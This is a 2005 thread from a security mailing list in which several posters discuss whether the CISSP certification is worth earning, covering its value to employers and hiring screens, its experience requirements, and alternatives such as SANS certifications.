> [mailto:[EMAIL PROTECTED] On Behalf Of Vladamir
> Sent: Tuesday, March 22, 2005 10:36 AM
> Cc: full-disclosure@lists.grok.org.uk; bugtraq@securityfocus.com
> Subject: [Full-disclosure] CISSP Test
>
> I have heard conflicting views of the CISSP exam, is it worth it?

-- 
"Unix IS user-friendly. It's just picky about who its friends are."
_,.-:*"``'*:-.,_,.-:*"``'*:-.,_,.-:*"``'*:-.,_,.-:*"``'*:-.,_,.-:*"``'*:-.,_
Daniel Fairchild CISSP - Chief Security Officer | [EMAIL PROTECTED]
Re: [Full-disclosure] CISSP Test
Just as with any other certs (or SATs or MCATs, etc, etc, etc) there are people who are really good at cramming the information from the book and have mastered the concept of the Multiple Choice questions. This by no means represents a good understanding of the subject matter...which would be why these people don't last long in the biz. Again, certs are just the foot in the door...you have to know your stuff if you're going to be successful in this field.

As far as other certs...I think that SANS (www.sans.org) has some well respected certs...but I don't think that over-certing yourself is really worth the time/money. CISSP covers all of the domains and shows that you have working knowledge of all (at least that's what it's supposed to do).

Just a word on the CISSP, you have to have worked in the field for 5 years (3 years with degree) in order to get it...otherwise you'll get the ISC2 associates cert...same exam and after the x years period, you will automatically be grandfathered in to CISSP.

wade
Re: [Full-disclosure] CISSP Test
Wow, thanks a lot. I'll pick the book back up, I have read about a lot of "clueless" CISSPs, this one gentleman I spoke with (Who is a CISSP) said that OpenBSD is easily remotely exploitable, it made me question the integrity of this gentleman and the process in which one becomes a CISSP (Assuming it has to do with thorough understanding of secure networks, platforms, etc)

What are some of the other Computer/Network security exams that are good for showing a thorough understanding of the concepts?

Wade Woolwine wrote:
> Agreed with Robert on this one. It's pretty much a sure-fire way to get
> your foot in the door...esp. if you're dealing with Gov. contractors or
> the Gov. itself. Once you have the job, if you don't have the skills, you
> won't last long. I figure 90% of the job battle is actually getting
> through the HR folks who look over resumes checking off boxes in a
> checklist to see if you qualify - certs/education and of course experience
> will fill all those check lists.
>
> wade
RE: [Full-disclosure] CISSP Test
Agreed with Robert on this one. It's pretty much a sure-fire way to get your foot in the door...esp. if you're dealing with Gov. contractors or the Gov. itself. Once you have the job, if you don't have the skills, you won't last long. I figure 90% of the job battle is actually getting through the HR folks who look over resumes checking off boxes in a checklist to see if you qualify - certs/education and of course experience will fill all those check lists.

wade
RE: [Full-disclosure] CISSP Test
Many companies that know little or nothing about security, which means a lot of them, use the CISSP as the "benchmark" for determining if they will even interview you for a position so from that standpoint it is good to have. The test is good for showing you have a good overall grasp of the security concepts that you would want a security professional to have but as always I wouldn't rely on the fact that someone was certified to decide if I was going to hire them.

My .02

Robert

-----Original Message-----
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Vladamir
Sent: Tuesday, March 22, 2005 10:36 AM
Cc: full-disclosure@lists.grok.org.uk; bugtraq@securityfocus.com
Subject: [Full-disclosure] CISSP Test

I have heard conflicting views of the CISSP exam, is it worth it?
[Full-disclosure] CISSP Test
I have heard conflicting views of the CISSP exam, is it worth it?